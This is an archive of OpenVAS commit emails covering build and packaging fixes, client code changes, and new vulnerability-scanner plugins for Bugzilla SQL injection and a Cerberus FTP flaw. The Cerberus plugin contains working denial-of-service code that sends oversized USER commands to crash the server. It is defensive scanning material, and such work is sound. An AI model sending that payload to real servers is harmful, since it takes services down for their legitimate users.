[Openvas-commits] r5350 - in trunk/openvas-plugins: . scripts Message-ID: <20091001190219.885AC85C72E9@pyrosoma.intevation.org> Author: reinke Date: 2009-10-01 21:02:17 +0200 (Thu, 01 Oct 2009) New Revision: 5350 Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/scripts/secpod_ibm_lotus_notes_html_inj_vuln_win.nasl Log: Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2009-10-01 16:57:31 UTC (rev 5349) +++ trunk/openvas-plugins/ChangeLog 2009-10-01 19:02:17 UTC (rev 5350) @@ -1,3 +1,7 @@ +2009-10-01 Thomas Reinke + * scripts/secpod_ibm_lotus_notes_html_inj_vuln_win.nasl: + Fix typo. + 2009-10-01 Michael Meyer * scripts/BigAnt_36407.nasl, Modified: trunk/openvas-plugins/scripts/secpod_ibm_lotus_notes_html_inj_vuln_win.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_ibm_lotus_notes_html_inj_vuln_win.nasl 2009-10-01 16:57:31 UTC (rev 5349) +++ trunk/openvas-plugins/scripts/secpod_ibm_lotus_notes_html_inj_vuln_win.nasl 2009-10-01 19:02:17 UTC (rev 5350) @@ -30,7 +30,7 @@ script_version("$Revision: 1.0 $"); script_cve_id("CVE-2009-3114"); script_bugtraq_id(36305); - script_name("IBM Lotus Notes RSS Reader Widget HTML Injection Vulneriability (Win)"); + script_name("IBM Lotus Notes RSS Reader Widget HTML Injection Vulnerability (Win)"); desc = " Overview: This host has IBM Lotus Notes installed and is prone to HTML Injection vulnerability. From scm-commit at wald.intevation.org Thu Oct 1 21:46:47 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 1 Oct 2009 21:46:47 +0200 (CEST) Subject: [Openvas-commits] r5351 - trunk/openvas-packaging/openvas-libraries/debian/trunk/debian Message-ID: <20091001194647.9785F852F3D8@pyrosoma.intevation.org> Author: jan Date: 2009-10-01 21:46:46 +0200 (Thu, 01 Oct 2009) New Revision: 5351 Modified: trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/changelog trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/libopenvas3.install Log: * libopenvas3.install: fixed pattern (spotted by Christopher Bertels) Modified: trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/changelog =================================================================== --- trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/changelog 2009-10-01 19:02:17 UTC (rev 5350) +++ trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/changelog 2009-10-01 19:46:46 UTC (rev 5351) @@ -3,6 +3,7 @@ * New upstream release. * rules: Fixed "major" release for libs. * libopenvas3.dirs: fixed path (libopenvas2 -> libopenvas3). + * libopenvas3.install: fixed pattern (spotted by Christopher Bertels) -- Jan-Oliver Wagner Mon, 28 Sep 2009 15:22:04 +0200 Modified: trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/libopenvas3.install =================================================================== --- trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/libopenvas3.install 2009-10-01 19:02:17 UTC (rev 5350) +++ trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/libopenvas3.install 2009-10-01 19:46:46 UTC (rev 5351) @@ -1 +1 @@ -usr/lib/libopenvas*so* +usr/lib/lib*.so.* From scm-commit at wald.intevation.org Thu Oct 1 22:42:16 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 1 Oct 2009 22:42:16 +0200 (CEST) Subject: [Openvas-commits] r5352 - trunk/doc/website Message-ID: <20091001204216.334ED8523D4B@pyrosoma.intevation.org> Author: jan Date: 2009-10-01 22:42:15 +0200 (Thu, 01 Oct 2009) New Revision: 5352 Modified: trunk/doc/website/team_tasks.htm4 Log: Added Christian Edjenguele as co-maintainer for -devel and -discuss mailing lists. Modified: trunk/doc/website/team_tasks.htm4 =================================================================== --- trunk/doc/website/team_tasks.htm4 2009-10-01 19:46:46 UTC (rev 5351) +++ trunk/doc/website/team_tasks.htm4 2009-10-01 20:42:15 UTC (rev 5352) @@ -101,12 +101,12 @@ Mailing List Admin openvas-devel Jan-Oliver Wagner - Vacant (you?) + Christian Edjenguele Mailing List Admin openvas-discuss Jan-Oliver Wagner - Vacant (you?) + Christian Edjenguele Mailing List Admin openvas-distro From scm-commit at wald.intevation.org Thu Oct 1 22:44:47 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 1 Oct 2009 22:44:47 +0200 (CEST) Subject: [Openvas-commits] r5353 - trunk/doc/website Message-ID: <20091001204447.A85A4852B6F9@pyrosoma.intevation.org> Author: jan Date: 2009-10-01 22:44:47 +0200 (Thu, 01 Oct 2009) New Revision: 5353 Modified: trunk/doc/website/team_tasks.htm4 Log: Added Geoff Galitz as bug tracker maintainer. Modified: trunk/doc/website/team_tasks.htm4 =================================================================== --- trunk/doc/website/team_tasks.htm4 2009-10-01 20:42:15 UTC (rev 5352) +++ trunk/doc/website/team_tasks.htm4 2009-10-01 20:44:47 UTC (rev 5353) @@ -60,7 +60,7 @@ Bug Tracker - Vacant (you?) + Geoff Galitz Felix Wolfsteller From scm-commit at wald.intevation.org Fri Oct 2 12:27:36 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Fri, 2 Oct 2009 12:27:36 +0200 (CEST) Subject: [Openvas-commits] r5354 - trunk/tools/openvas-lsc-target-preparation Message-ID: <20091002102736.38001861EAA1@pyrosoma.intevation.org> Author: felix Date: 2009-10-02 12:27:35 +0200 (Fri, 02 Oct 2009) New Revision: 5354 Modified: trunk/tools/openvas-lsc-target-preparation/Changelog trunk/tools/openvas-lsc-target-preparation/MANIFEST trunk/tools/openvas-lsc-target-preparation/Makefile Log: Fixed a bug. Output of ls differs in ordering depending on the locale. In the Makefile, the diff command compares ls output with MANIFEST, leading to wrong results if these files are sorted differently. Found in cooperation with Matthew Mundell. * MANIFEST: Sorted "traditionally". * Makefile: Set locale to have the ls command sort "traditionally". Modified: trunk/tools/openvas-lsc-target-preparation/Changelog =================================================================== --- trunk/tools/openvas-lsc-target-preparation/Changelog 2009-10-01 20:44:47 UTC (rev 5353) +++ trunk/tools/openvas-lsc-target-preparation/Changelog 2009-10-02 10:27:35 UTC (rev 5354) @@ -1,3 +1,14 @@ +2009-10-02 Felix Wolfsteller + + Fixed a bug. Output of ls differs in ordering depending on the locale. + In the Makefile, the diff command compares ls output with MANIFEST, + leading to wrong results if these files are sorted differently. + Found in cooperation with Matthew Mundell. + + * MANIFEST: Sorted "traditionally". + + * Makefile: Set locale to have the ls command sort "traditionally". + 2009-09-23 Felix Wolfsteller * create-rpm.sh: Fixed bashism. Modified: trunk/tools/openvas-lsc-target-preparation/MANIFEST =================================================================== --- trunk/tools/openvas-lsc-target-preparation/MANIFEST 2009-10-01 20:44:47 UTC (rev 5353) +++ trunk/tools/openvas-lsc-target-preparation/MANIFEST 2009-10-02 10:27:35 UTC (rev 5354) @@ -1,14 +1,14 @@ Changelog -configure -create-rpm.sh -lsc-pubkey.pub +MANIFEST Makefile -makeself-2.1.5 -MANIFEST NAME -openvas-lsc-target.spec.in PUBKEYNAME README RPMBASENAME TODO VERSION +configure +create-rpm.sh +lsc-pubkey.pub +makeself-2.1.5 +openvas-lsc-target.spec.in \ No newline at end of file Modified: trunk/tools/openvas-lsc-target-preparation/Makefile =================================================================== --- trunk/tools/openvas-lsc-target-preparation/Makefile 2009-10-01 20:44:47 UTC (rev 5353) +++ trunk/tools/openvas-lsc-target-preparation/Makefile 2009-10-02 10:27:35 UTC (rev 5354) @@ -23,7 +23,7 @@ cp lsc-pubkey.pub $(RPM_BUILD_ROOT)/home/$(PUBKEYNAME)/.ssh/authorized_keys clean: - ls | egrep -v "\.spec" | diff MANIFEST - | grep "^>" | sed 's/^..//' | xargs rm -rf + LC_ALL=C ls | egrep -v "\.spec" | diff MANIFEST - | grep "^>" | sed 's/^..//' | xargs rm -rf # The default pubkey is used as an example, to test the building # system locally. An RPM should be generated. From scm-commit at wald.intevation.org Fri Oct 2 12:33:54 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Fri, 2 Oct 2009 12:33:54 +0200 (CEST) Subject: [Openvas-commits] r5355 - trunk/tools/openvas-lsc-target-preparation Message-ID: <20091002103354.15679861EAA2@pyrosoma.intevation.org> Author: mattm Date: 2009-10-02 12:33:53 +0200 (Fri, 02 Oct 2009) New Revision: 5355 Modified: trunk/tools/openvas-lsc-target-preparation/Changelog trunk/tools/openvas-lsc-target-preparation/MANIFEST Log: * MANIFEST: Add newline at end of file. Modified: trunk/tools/openvas-lsc-target-preparation/Changelog =================================================================== --- trunk/tools/openvas-lsc-target-preparation/Changelog 2009-10-02 10:27:35 UTC (rev 5354) +++ trunk/tools/openvas-lsc-target-preparation/Changelog 2009-10-02 10:33:53 UTC (rev 5355) @@ -1,3 +1,7 @@ +2009-10-02 Matthew Mundell + + * MANIFEST: Add newline at end of file. + 2009-10-02 Felix Wolfsteller Fixed a bug. Output of ls differs in ordering depending on the locale. @@ -16,21 +20,21 @@ 2009-05-06 Felix Wolfsteller * openvas-lsc-target.spec.in: Delete user when package is uninstalled. - + * TODO: Todos added (what happens if user exists, expire- date?). 2009-04-24 Felix Wolfsteller * README: Corrected words about suggested invocation. - + * create-rpm.sh: Removed three parameter version. If the makeself-generated script is called exactly as described in the README it is not needed, argument count will be 1 and not 3. - + 2009-04-24 Felix Wolfsteller * README: Added words about suggested invocation. - + * TODO: Need to remove the user when package is uninstalled. 2009-04-24 Felix Wolfsteller Modified: trunk/tools/openvas-lsc-target-preparation/MANIFEST =================================================================== --- trunk/tools/openvas-lsc-target-preparation/MANIFEST 2009-10-02 10:27:35 UTC (rev 5354) +++ trunk/tools/openvas-lsc-target-preparation/MANIFEST 2009-10-02 10:33:53 UTC (rev 5355) @@ -11,4 +11,4 @@ create-rpm.sh lsc-pubkey.pub makeself-2.1.5 -openvas-lsc-target.spec.in \ No newline at end of file +openvas-lsc-target.spec.in From scm-commit at wald.intevation.org Fri Oct 2 13:02:31 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Fri, 2 Oct 2009 13:02:31 +0200 (CEST) Subject: [Openvas-commits] r5356 - in trunk/openvas-client: . openvas/prefs_dialog Message-ID: <20091002110231.343D7861EABD@pyrosoma.intevation.org> Author: felix Date: 2009-10-02 13:02:29 +0200 (Fri, 02 Oct 2009) New Revision: 5356 Modified: trunk/openvas-client/ChangeLog trunk/openvas-client/openvas/prefs_dialog/prefs_context.c trunk/openvas-client/openvas/prefs_dialog/prefs_dialog_auth.c Log: * openvas/prefs_dialog/prefs_dialog_auth.c (prefs_dialog_auth_connect_dialog): Initialize variables with NULL. * openvas/prefs_dialog/prefs_context.c (prefs_context_update_widgets): Guard CONTEXT_SERVER which is only defined if configured with --enable-omp. Modified: trunk/openvas-client/ChangeLog =================================================================== --- trunk/openvas-client/ChangeLog 2009-10-02 10:33:53 UTC (rev 5355) +++ trunk/openvas-client/ChangeLog 2009-10-02 11:02:29 UTC (rev 5356) @@ -1,3 +1,12 @@ +2009-10-02 Felix Wolfsteller + + * openvas/prefs_dialog/prefs_dialog_auth.c + (prefs_dialog_auth_connect_dialog): Initialize variables with NULL. + + * openvas/prefs_dialog/prefs_context.c (prefs_context_update_widgets): + Guard CONTEXT_SERVER which is only defined if configured with + --enable-omp. + 2009-09-30 Matthew Mundell * openvas/prefs_dialog/prefs_dialog.c (prefs_dialog_setup): Only define Modified: trunk/openvas-client/openvas/prefs_dialog/prefs_context.c =================================================================== --- trunk/openvas-client/openvas/prefs_dialog/prefs_context.c 2009-10-02 10:33:53 UTC (rev 5355) +++ trunk/openvas-client/openvas/prefs_dialog/prefs_context.c 2009-10-02 11:02:29 UTC (rev 5356) @@ -91,7 +91,11 @@ #endif /* undefined DISABLE_OTP */ prefs_context_enable_widget("EXECSCOPE_MENUITEM", type >= CONTEXT_SCOPE && action == CONTEXT_IDLE ); - prefs_context_enable_widget("NEWSCOPE_MENUITEM", type >= CONTEXT_TASK || type == CONTEXT_SERVER); + prefs_context_enable_widget("NEWSCOPE_MENUITEM", type >= CONTEXT_TASK +#ifdef USE_OMP + || type == CONTEXT_SERVER +#endif + ); prefs_context_enable_widget("RENAMESCOPE_MENUITEM", type >= CONTEXT_SCOPE); prefs_context_enable_widget("DELETESCOPE_MENUITEM", type >= CONTEXT_SCOPE); Modified: trunk/openvas-client/openvas/prefs_dialog/prefs_dialog_auth.c =================================================================== --- trunk/openvas-client/openvas/prefs_dialog/prefs_dialog_auth.c 2009-10-02 10:33:53 UTC (rev 5355) +++ trunk/openvas-client/openvas/prefs_dialog/prefs_dialog_auth.c 2009-10-02 11:02:29 UTC (rev 5356) @@ -525,7 +525,8 @@ if(gtk_dialog_run(GTK_DIALOG(auth->dialog)) == GTK_RESPONSE_OK) { #ifdef USE_OMP - struct context *original_context, *manager; + struct context *original_context = NULL; + struct context *manager = NULL; #endif const char *hostname; int port; From scm-commit at wald.intevation.org Fri Oct 2 13:10:28 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Fri, 2 Oct 2009 13:10:28 +0200 (CEST) Subject: [Openvas-commits] r5357 - in trunk/openvas-client: . include src/gui src/util Message-ID: <20091002111028.D3F27861EAA2@pyrosoma.intevation.org> Author: felix Date: 2009-10-02 13:10:27 +0200 (Fri, 02 Oct 2009) New Revision: 5357 Modified: trunk/openvas-client/ChangeLog trunk/openvas-client/include/config.h.in trunk/openvas-client/src/gui/nvt_pref_sshlogin.h trunk/openvas-client/src/util/openvas_ssh_key_create.c Log: * include/config.h.in: Set ENABLE_SAFE_TESTS to 0. * src/gui/nvt_prefs_sshlogin.h, src/util/openvas_ssh_key_create.c: Include config.h to include exactly the same context as in other places. Modified: trunk/openvas-client/ChangeLog =================================================================== --- trunk/openvas-client/ChangeLog 2009-10-02 11:02:29 UTC (rev 5356) +++ trunk/openvas-client/ChangeLog 2009-10-02 11:10:27 UTC (rev 5357) @@ -1,5 +1,12 @@ 2009-10-02 Felix Wolfsteller + * include/config.h.in: Set ENABLE_SAFE_TESTS to 0. + + * src/gui/nvt_prefs_sshlogin.h, src/util/openvas_ssh_key_create.c: + Include config.h to include exactly the same context as in other places. + +2009-10-02 Felix Wolfsteller + * openvas/prefs_dialog/prefs_dialog_auth.c (prefs_dialog_auth_connect_dialog): Initialize variables with NULL. Modified: trunk/openvas-client/include/config.h.in =================================================================== --- trunk/openvas-client/include/config.h.in 2009-10-02 11:02:29 UTC (rev 5356) +++ trunk/openvas-client/include/config.h.in 2009-10-02 11:10:27 UTC (rev 5357) @@ -254,7 +254,7 @@ /* * Experimental features */ -#define ENABLE_SAVE_TESTS 1 +#define ENABLE_SAVE_TESTS 0 #define ENABLE_SAVE_KB 1 /* * Local Variables: Modified: trunk/openvas-client/src/gui/nvt_pref_sshlogin.h =================================================================== --- trunk/openvas-client/src/gui/nvt_pref_sshlogin.h 2009-10-02 11:02:29 UTC (rev 5356) +++ trunk/openvas-client/src/gui/nvt_pref_sshlogin.h 2009-10-02 11:10:27 UTC (rev 5357) @@ -28,6 +28,10 @@ #ifdef USE_GTK +/** @todo Remove dependence of config.h (some defines influence member variables + * of struct context in context.h) */ +#include "config.h" /* to have ENABLE_SAVE_TESTS defined before including the + context */ #include "context.h" void nvt_pref_sshlogin_add (GtkWidget* vbox, struct arglist* pref); Modified: trunk/openvas-client/src/util/openvas_ssh_key_create.c =================================================================== --- trunk/openvas-client/src/util/openvas_ssh_key_create.c 2009-10-02 11:02:29 UTC (rev 5356) +++ trunk/openvas-client/src/util/openvas_ssh_key_create.c 2009-10-02 11:10:27 UTC (rev 5357) @@ -37,6 +37,10 @@ #include "openvas_i18n.h" #include "error_dlg.h" +/** @todo Remove dependence of config.h (some defines influence member variables + * of struct context in context.h) */ +#include "config.h" /* to have ENABLE_SAVE_TESTS defined before including the + context */ #include "context.h" From scm-commit at wald.intevation.org Fri Oct 2 19:48:18 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Fri, 2 Oct 2009 19:48:18 +0200 (CEST) Subject: [Openvas-commits] r5358 - in trunk/openvas-plugins: . scripts Message-ID: <20091002174818.7044B861EAC3@pyrosoma.intevation.org> Author: mime Date: 2009-10-02 19:48:14 +0200 (Fri, 02 Oct 2009) New Revision: 5358 Added: trunk/openvas-plugins/scripts/bugzilla_36371.nasl trunk/openvas-plugins/scripts/bugzilla_36373.nasl trunk/openvas-plugins/scripts/cerberus_ftp_server_36390.nasl trunk/openvas-plugins/scripts/photopost_detect.nasl trunk/openvas-plugins/scripts/webmirror.nasl Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/cve_current.txt trunk/openvas-plugins/scripts/misc_func.inc trunk/openvas-plugins/scripts/sambar_cgi_path_disclosure.nasl trunk/openvas-plugins/scripts/secpod_surgemail_detect.nasl trunk/openvas-plugins/scripts/ypupdated_remote_exec.nasl Log: Added new plugins. Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2009-10-02 11:10:27 UTC (rev 5357) +++ trunk/openvas-plugins/ChangeLog 2009-10-02 17:48:14 UTC (rev 5358) @@ -1,3 +1,20 @@ +2009-10-02 Michael Meyer + + * scripts/photopost_detect.nasl, + scripts/bugzilla_36373.nasl, + scripts/cerberus_ftp_server_36390.nasl, + scripts/bugzilla_36371.nasl, + scripts/webmirror.nasl: + Added new plugins. + + * scripts/sambar_cgi_path_disclosure.nasl, + scripts/ypupdated_remote_exec.nasl, + scripts/secpod_surgemail_detect.nasl: + Bugfixes. + + * scripts/misc_func.inc: + Added function get_unknown_svc(). + 2009-10-01 Thomas Reinke * scripts/secpod_ibm_lotus_notes_html_inj_vuln_win.nasl: Fix typo. Modified: trunk/openvas-plugins/cve_current.txt =================================================================== --- trunk/openvas-plugins/cve_current.txt 2009-10-02 11:10:27 UTC (rev 5357) +++ trunk/openvas-plugins/cve_current.txt 2009-10-02 17:48:14 UTC (rev 5358) @@ -99,3 +99,6 @@ 36554 Greenbone svn R 36490 Greenbone svn R CVE-2009-3103 Greenbone svn R +CVE-2009-3125 Greenbone svn R +36390 Greenbone svn R +CVE-2009-3165 Greenbone svn R Added: trunk/openvas-plugins/scripts/bugzilla_36371.nasl =================================================================== --- trunk/openvas-plugins/scripts/bugzilla_36371.nasl 2009-10-02 11:10:27 UTC (rev 5357) +++ trunk/openvas-plugins/scripts/bugzilla_36371.nasl 2009-10-02 17:48:14 UTC (rev 5358) @@ -0,0 +1,93 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Mozilla Bugzilla 'Bug.search()' WebService Function SQL Injection Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100286); + script_bugtraq_id(36371); + script_cve_id("CVE-2009-3125"); + script_version ("1.0-$Revision$"); + + script_name("Mozilla Bugzilla 'Bug.search()' WebService Function SQL Injection Vulnerability"); + +desc = "Overview: +Bugzilla is prone to an SQL-injection vulnerability because it fails +to sufficiently sanitize user-supplied data before using it in an SQL +query. + +Exploiting this issue could allow an attacker to compromise the +application, access or modify data, or exploit latent vulnerabilities +in the underlying database. + +The following versions are affected: + +Bugzilla 3.3.2 through 3.4.1 Bugzilla 3.5 + +Solution: +Updates are available. Please see the references for details. + +References: +http://www.securityfocus.com/bid/36371 +https://bugzilla.mozilla.org/show_bug.cgi?id=515191 +http://www.bugzilla.org/security/3.0.8/ +http://www.bugzilla.org + + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if Bugzilla is prone to an SQL-injection vulnerability"); + script_category(ACT_GATHER_INFO); + script_family("Web application abuses"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("bugzilla_detect.nasl"); + script_require_ports("Services/www", 80); + script_exclude_keys("Settings/disable_cgi_scanning"); + exit(0); +} + +include("http_func.inc"); +include("http_keepalive.inc"); +include("version_func.inc"); + +port = get_http_port(default:80); +if(!get_port_state(port))exit(0); + +if (!can_host_php(port:port)) exit(0); + +if(!version = get_kb_item(string("www/", port, "/bugzilla/version")))exit(0); + +if(!isnull(version) && version >!< "unknown") { + + if(version_in_range(version:version, test_version:"3.4", test_version2:"3.4.1") || + version_in_range(version:version, test_version:"3.3", test_version2:"3.3.4") || + version_is_equal(version:version, test_version:"3.5")) { + security_warning(port:port); + exit(0); + } +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/bugzilla_36371.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/bugzilla_36373.nasl =================================================================== --- trunk/openvas-plugins/scripts/bugzilla_36373.nasl 2009-10-02 11:10:27 UTC (rev 5357) +++ trunk/openvas-plugins/scripts/bugzilla_36373.nasl 2009-10-02 17:48:14 UTC (rev 5358) @@ -0,0 +1,97 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Mozilla Bugzilla 'Bug.create()' WebService Function SQL Injection Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100287); + script_bugtraq_id(36373); + script_cve_id("CVE-2009-3165"); + script_version ("1.0-$Revision$"); + + script_name("Mozilla Bugzilla 'Bug.create()' WebService Function SQL Injection Vulnerability"); + +desc = "Overview: +Bugzilla is prone to an SQL-injection vulnerability because it fails +to sufficiently sanitize user-supplied data before using it in an SQL +query. + +Exploiting this issue could allow an attacker to compromise the +application, access or modify data, or exploit latent vulnerabilities +in the underlying database. + +The following versions are vulnerable: + +Bugzilla 2.23.4 through 3.0.8 Bugzilla 3.1.1 through 3.2.4 Bugzilla +3.3.1 through 3.4.1 + +Solution: +Updates are available. Please see the references for details. + +References: +http://www.securityfocus.com/bid/36373 +https://bugzilla.mozilla.org/show_bug.cgi?id=515191 +http://www.bugzilla.org/security/3.0.8/ +http://www.bugzilla.org + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if Bugzilla is prone to an SQL-injection vulnerability"); + script_category(ACT_GATHER_INFO); + script_family("Web application abuses"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("bugzilla_detect.nasl"); + script_require_ports("Services/www", 80); + script_exclude_keys("Settings/disable_cgi_scanning"); + exit(0); +} + +include("http_func.inc"); +include("http_keepalive.inc"); +include("version_func.inc"); + +port = get_http_port(default:80); +if(!get_port_state(port))exit(0); + +if (!can_host_php(port:port)) exit(0); + +if(!version = get_kb_item(string("www/", port, "/bugzilla/version")))exit(0); +if(!isnull(version) && version >!< "unknown") { + + if( + version_in_range(version:version, test_version:"3.4", test_version2:"3.4.1") || + version_in_range(version:version, test_version:"3.3", test_version2:"3.3.4") || + version_in_range(version:version, test_version:"3.2", test_version2:"3.2.4") || + version_in_range(version:version, test_version:"3.1", test_version2:"3.1.4") || + version_in_range(version:version, test_version:"3.0", test_version2:"3.0.8") || + version_in_range(version:version, test_version:"2.23", test_version2:"2.23.4") || + version_in_range(version:version, test_version:"2.4", test_version2:"2.9")) { + security_warning(port:port); + exit(0); + } +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/bugzilla_36373.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/cerberus_ftp_server_36390.nasl =================================================================== --- trunk/openvas-plugins/scripts/cerberus_ftp_server_36390.nasl 2009-10-02 11:10:27 UTC (rev 5357) +++ trunk/openvas-plugins/scripts/cerberus_ftp_server_36390.nasl 2009-10-02 17:48:14 UTC (rev 5358) @@ -0,0 +1,115 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Cerberus FTP Server Long Command Remote Denial of Service Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100284); + script_bugtraq_id(36390); + script_version ("1.0-$Revision$"); + + script_name("Cerberus FTP Server Long Command Remote Denial of Service Vulnerability"); + +desc = "Overview: +Cerberus FTP Server is prone to a denial-of-service vulnerability. + +An attacker can exploit this issue to terminate the affected +application, denying service to legitimate users. + +This issue affects Cerberus FTP Server 3.0.3 through 3.0.6; other +versions may also be affected. + +References: +http://www.securityfocus.com/bid/36390 +http://www.cerberusftp.com/index.html +http://www.securityfocus.com/archive/1/506858 + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if Cerberus FTP Server is prone to a denial-of-service vulnerability"); + script_category(ACT_GATHER_INFO); + script_family("FTP"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("find_service.nes","secpod_ftp_anonymous.nasl","ftpserver_detect_type_nd_version.nasl"); + script_require_ports("Services/ftp", 21); + exit(0); +} + +include("ftp_func.inc"); + +if(safe_checks())exit(0); + +ftpPort = get_kb_item("Services/ftp"); +if(!ftpPort){ + ftpPort = 21; +} + +if(get_kb_item('ftp/'+ftpPort+'/broken'))exit(0); + +if(!get_port_state(ftpPort)){ + exit(0); +} + +if(!banner = get_ftp_banner(port:ftpPort))exit(0); + +if("Cerberus" >!< banner)exit(0); + +soc1 = open_sock_tcp(ftpPort); +soc2 = open_sock_tcp(ftpPort); +soc3 = open_sock_tcp(ftpPort); +soc4 = open_sock_tcp(ftpPort); + +if(!soc1 || !soc2 || !soc3 || !soc4){ + exit(0); +} + +req1 = string("USER ", crap(data: raw_string(0x41), length: 330), "\r\n"); +req2 = string("USER ", crap(data: raw_string(0x41), length: 520), "\r\n"); +req3 = string("USER ", crap(data: raw_string(0x41), length: 2230), "\r\n"); + +send(socket:soc1, data:req1); +send(socket:soc2, data:req2); +send(socket:soc3, data:req3); +send(socket:soc4, data:req1); + +close(soc1); +close(soc2); +close(soc3); +close(soc4); + +sleep(3); + +soc = open_sock_tcp(ftpPort); + +if(!ftp_recv_line(socket: soc)) { + security_warning(port:ftpPort); + if(soc)close(soc); + exit(0); +} + +if(soc)close(soc); + +exit(0); Property changes on: trunk/openvas-plugins/scripts/cerberus_ftp_server_36390.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Modified: trunk/openvas-plugins/scripts/misc_func.inc =================================================================== --- trunk/openvas-plugins/scripts/misc_func.inc 2009-10-02 11:10:27 UTC (rev 5357) +++ trunk/openvas-plugins/scripts/misc_func.inc 2009-10-02 17:48:14 UTC (rev 5358) @@ -3,6 +3,27 @@ # (C) 2002 Michel Arboi # $Revision: 1.53 $ +function get_unknown_svc() + { + + local_var port; + + if(!isnull(_FCT_ANON_ARGS[0])) { + port = _FCT_ANON_ARGS[0]; + } else { + port = get_kb_item("Services/unknown"); + } + + if(!port)return 0; + if (port == 139)return 0; + + if(service_is_unknown(port:port)) { + return port; + } else { + return 0; + } + } + function register_service(port, proto, ipproto) { local_var k; Added: trunk/openvas-plugins/scripts/photopost_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/photopost_detect.nasl 2009-10-02 11:10:27 UTC (rev 5357) +++ trunk/openvas-plugins/scripts/photopost_detect.nasl 2009-10-02 17:48:14 UTC (rev 5358) @@ -0,0 +1,105 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Photopost Detection +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +# need desc here to modify it later in script. +desc = "Overview: +This host is running Photopost, a photo sharing gallery software. + +See also: +http://www.photopost.com/ + +Risk factor : None"; + +if (description) +{ + script_id(100285); + script_version ("1.0-$Revision$"); + + script_name("Photopost Detection"); + script_description(desc); + script_summary("Checks for the presence of Photopost"); + script_category(ACT_GATHER_INFO); + script_family("Service detection"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + 